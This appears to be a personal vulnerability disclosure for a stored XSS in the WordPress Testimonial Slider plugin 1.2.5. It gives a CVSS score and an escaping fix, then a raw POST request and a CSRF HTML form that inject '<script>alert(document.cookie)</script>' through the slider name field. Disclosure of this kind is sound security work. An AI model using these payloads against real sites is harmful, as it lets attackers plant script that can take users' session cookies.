So instead of playing CTF challenges in the evening I decided to go for CVE hunting. As this was my first time really doing this I opted to start easy with some wordpress plugins to find any vulnerabilities. Once I found a vulnerability I reported the details to email@example.com and then filled in the details in CVE Form to assign a CVE to the vulnerability. Unfortunualty the vulnerability was already discovered before I did.
Title: Stored XSS in Testimonial-slider plugin (Wordpress)
Plugin: Testimonial Slider
CVSS score: 3.3 AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:X
Testimonial-slider version tested: 1.2.5
Wordpress version tested: 4.9.6
Possible to combine with a CSRF attack if no other CSRF counter measures are present in the wordpress application.
Escape all characters when outputting the values in the response. This could be done by using a decent escaping function in the file settings/sliders.php on line 97
<li class="yellow"><a href="#tabs-<?php echo $slider['slider_id']; ?>"><?php echo htmlentities($slider['slider_name']); ?></a></li>
An authenticated user could store an XSS payload using the testimonial-plugin. When creating a slider name the function fails to sanitise the '<' and '>'. There are some characters escaped (eg ' ")so this increases the difficulty to exploit it. Nevertheless it is still possible. The following post request shows an example of an XSS payload:
POST /wp-admin/admin.php?page=testimonial-slider-admin HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://www.example.com/wp-admin/admin.php?page=testimonial-slider-admin Content-Type: application/x-www-form-urlencoded Content-Length: 121 Cookie: <Cookies> Connection: close Upgrade-Insecure-Requests: 1 create_new_slider=1&new_slider_name=slider1<script>alert(document.cookie)</script>&create_new=Create+New&active_tab=2
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://www.example.com/wp-admin/admin.php?page=testimonial-slider-admin" method="POST"> <input type="hidden" name="create_new_slider" value="1" /> <input type="hidden" name="new_slider_name" value="slider1<script>alert(document.cookie)</script>" /> <input type="hidden" name="create_new" value="Create New" /> <input type="hidden" name="active_tab" value="2" /> <input type="submit" value="Submit request" /> </form> </body> </html>